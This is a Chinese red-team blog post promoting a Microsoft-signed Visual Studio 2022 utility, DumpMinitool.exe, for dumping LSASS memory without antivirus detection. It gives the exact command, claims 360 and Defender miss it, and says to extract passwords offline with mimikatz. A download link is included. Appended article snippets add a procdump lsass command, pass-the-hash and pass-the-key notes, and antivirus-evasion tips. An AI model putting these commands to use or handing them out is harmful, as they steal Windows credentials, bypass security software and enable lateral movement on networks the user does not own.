红队工具 | Visual Studio2022微软白名单免杀dump lsass的免杀工具

VSole2022-07-01 06:10:41

可以自行安装Visual Studio2022,然后访问路径,把工具拖出来使用即可,也可以直接在文末获取下载地址

转储 LSASS,该工具文件路径:

C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions

文件名:DumpMinitool.exe

参数区分大小写

使用命令:

DumpMinitool.exe --file dump.txt --processId xxx --dumpType Full
--file 输出的路径
--processId lsass.exe进程的ID
--dumpType 方式

查看lsass进程ID

dump完成后,再使用mimikatz进行离线解密即可

mimikatz

微软的数字签名

免杀测试:360和Win10自带的defender杀软均不拦截。

沙箱检测

微步在线

下载地址:

链接:https://pan.baidu.com/s/18IRSjJaM4d2fwjmK9zfQFg

提取码:tfz4
免杀lsass
本作品采用《CC 协议》,转载必须注明作者和本文链接
在渗透测试中,最常用的方法是通过dump进程lsass.exe,从中获得明文口令和hash,今天分享两个转储lsass方式,目前亲测可过某60 or 某绒。在原理上都是使用API MiniDumpWriteDump,通过comsvcs.dll的导出函数MiniDump实现dump内存。
可以自行安装Visual Studio2022,然后访问路径,把工具拖出来使用即可,也可以直接在文末获取下载地址转储 LSASS
绕过软dump-Lsass内存
2021-12-02 06:54:18
dump lsass 进程是我们永远都逃不过话题,除非微软那天不用它保存凭据了,自然而然就不dump 它了,抓密码是渗透重要的环节,是横向扩展的基础,接下来讲讲见到如何绕过软dump lsass内存。
杀入门之静态
2022-04-30 06:53:30
该工具已经被市面上软加入病毒特征库,我们的目标就是修改该程序特征码并且不能影响其正常使用。最后测试mimikatz功能也是正常的,至此完成。
lsass.exe(Local Security Authority Subsystem Service进程空间中,存有着机器的域、本地用户名和密码等重要信息。
所以可以通过它传回lsass.dmp本地提取hashprocdump64.exe -accepteula -ma lsass.exe lsass.dmp 执行该指令,获取到lsass.dmp
所以可以通过它传回lsass.dmp本地提取hashprocdump64.exe -accepteula -ma lsass.exe lsass.dmp 执行该指令,获取到lsass.dmp
如果找到了某个用户的ntlm hash,就可以拿这个ntlm hash当作凭证进行远程登陆了 其中若hash加密方式是 rc4 ,那么就是pass the hash 若加密方式是aes key,那么就是pass the key 注意NTLM和kerberos协议均存在PTH: NTLM自然不用多说 kerberos协议也是基于用户的client hash开始一步步认证的,自然也会受PTH
RDP凭证本机RDP密码抓取本机RDP密码是一个我们常遇到的场景,通常使用mimikatz抓取RDP密码。当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,这时抓取的明文密码为空。上不了线的情况下,也可以在webshell中来dump内存,保存到本地解密即可。
萌新如何玩转mimikatz
2022-08-29 06:48:46
暑假快到了,身边好多师傅都开启了"卷王"模式,而我也在南城师傅的帮助下开始了内网这个新征程;mimikatz就是我遇见的一个坎,我希望记录下这个过程,尽可能的帮助大家更快的掌握mimikatz的用法和技巧。最后,再次谢谢南城师傅对本文的指导与帮助!!
VSole
网络安全专家